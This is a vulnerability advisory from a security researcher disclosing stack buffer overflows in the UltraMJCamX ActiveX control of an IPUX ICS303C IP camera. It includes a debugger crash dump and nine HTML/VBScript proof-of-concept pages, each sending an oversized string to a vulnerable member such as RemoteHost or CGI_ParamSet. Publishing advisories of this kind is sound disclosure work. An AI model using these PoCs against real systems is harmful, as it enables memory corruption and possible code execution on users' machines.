273 lines
No EOL
6.6 KiB
Text
273 lines
No EOL
6.6 KiB
Text
|
|
IPUX Cube Type CS303C IP Camera (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow
|
|
|
|
|
|
Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
|
|
Product web page: http://www.ipux.net | http://www.fitivision.com
|
|
Affected version: Cube Type ICS303C (firmware: ICS303C 1.0.0-17 20140120 r1511)
|
|
|
|
Summary: The device is Day and Night Cube Network camera with CMOS sensor. With
|
|
Motion JPEG video compression, the file size of video stream is extremely reduced,
|
|
as to optimize the network bandwidth efficiency. It has 3X digital zoom feature for
|
|
a larger space monitoring. The ICS303C comes with a IR-cut filter and 4 built-in IR
|
|
illuminators for both day and night applications.
|
|
|
|
Desc: The UltraMJCam ActiveX Control 'UltraMJCamX.ocx' suffers from a stack buffer
|
|
overflow vulnerability when parsing large amount of bytes to several functions in
|
|
UltraMJCamLib, resulting in memory corruption overwriting several registers including
|
|
the SEH. An attacker can gain access to the system of the affected node and execute
|
|
arbitrary code.
|
|
|
|
----------------------------------------------------------------------------------
|
|
|
|
(48d0.2e98): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraMJCamX.ocx -
|
|
eax=41414149 ebx=00000001 ecx=00002e98 edx=02636d5b esi=41414141 edi=02636d5b
|
|
eip=7796466c esp=0038ebf4 ebp=0038ec28 iopl=0 nv up ei pl zr na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
|
|
ntdll!RtlDeleteCriticalSection+0x77:
|
|
7796466c 833800 cmp dword ptr [eax],0 ds:002b:41414149=????????
|
|
|
|
----------------------------------------------------------------------------------
|
|
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
|
|
|
|
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2014-5214
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5214.php
|
|
|
|
|
|
16.11.2014
|
|
|
|
---
|
|
|
|
|
|
Properties:
|
|
-----------
|
|
|
|
FileDescription UltraMJCam ActiveX Control
|
|
FileVersion 1, 0, 52, 23
|
|
InternalName UltraMJCamX
|
|
OriginalFileName UltraMJCamX.ocx
|
|
ProductName UltraMJCam device ActiveX Control
|
|
ProductVersion 1, 0, 52, 23
|
|
|
|
|
|
List of members:
|
|
----------------
|
|
|
|
Interface IUltraMJCamX : IDispatch
|
|
Default Interface: True
|
|
Members : 65
|
|
RemoteHost
|
|
RemotePort
|
|
AccountCode
|
|
GetConfigValue
|
|
SetConfigValue
|
|
SetCGIAPNAME
|
|
Password
|
|
UserName
|
|
fChgImageSize
|
|
ImgWidth
|
|
ImgHeight
|
|
SnapFileName
|
|
AVIRecStart
|
|
SetImgScale
|
|
OpenFolder
|
|
OpenFileDlg
|
|
TriggerStatus
|
|
AVIRecStatus
|
|
Event_Frame
|
|
PlayVideo
|
|
SetAutoScale
|
|
Event_Signal
|
|
WavPlay
|
|
CGI_ParamGet
|
|
CGI_ParamSet
|
|
MulticastEnable
|
|
MulticastStatus
|
|
SetPTUserAllow
|
|
SetLanguage
|
|
TimestampEnable
|
|
TimestampStroke
|
|
|
|
|
|
Vulnerable members of the class:
|
|
--------------------------------
|
|
|
|
RemoteHost
|
|
AccountCode
|
|
SetCGIAPNAME
|
|
Password
|
|
Username
|
|
SnapFileName
|
|
OpenFolder
|
|
CGI_ParamGet
|
|
CGI_ParamSet
|
|
|
|
|
|
PoC(s):
|
|
-------
|
|
|
|
|
|
---1
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let RemoteHost As String"
|
|
memberName = "RemoteHost"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(1044, "A")
|
|
target.RemoteHost = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---2
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let AccountCode As String"
|
|
memberName = "AccountCode"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(3092, "A")
|
|
target.AccountCode = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---3
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let SetCGIAPNAME As String"
|
|
memberName = "SetCGIAPNAME"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(3092, "A")
|
|
target.SetCGIAPNAME = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---4
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let Password As String"
|
|
memberName = "Password"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(2068, "A")
|
|
target.Password = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---5
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let UserName As String"
|
|
memberName = "UserName"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(4116, "A")
|
|
target.UserName = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---6
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Property Let SnapFileName As String"
|
|
memberName = "SnapFileName"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(4116, "A")
|
|
target.SnapFileName = arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---7
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Function OpenFolder ( ByVal sInitPath As String ) As String"
|
|
memberName = "OpenFolder"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 1
|
|
arg1=String(5140, "A")
|
|
target.OpenFolder arg1
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---8
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Function CGI_ParamGet ( ByVal sGroup As String , ByVal sName As String ) As String"
|
|
memberName = "CGI_ParamGet"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 2
|
|
arg1=String(4116, "A")
|
|
arg2="defaultV"
|
|
target.CGI_ParamGet arg1 ,arg2
|
|
</script>
|
|
</html>
|
|
|
|
|
|
---9
|
|
|
|
|
|
<html>
|
|
<object classid='clsid:950D732B-EF81-4DC0-A7F2-8A46D94CF55C' id='target' />
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Windows\Downloaded Program Files\UltraMJCamX.ocx"
|
|
prototype = "Function CGI_ParamSet ( ByVal sGroup As String , ByVal sName As String , ByVal SVal As String ) As Long"
|
|
memberName = "CGI_ParamSet"
|
|
progid = "UltraMJCamLib.UltraMJCamX"
|
|
argCount = 3
|
|
arg1=String(10260, "A")
|
|
arg2="defaultV"
|
|
arg3="defaultV"
|
|
target.CGI_ParamSet arg1 ,arg2 ,arg3
|
|
</script>
|
|
</html> |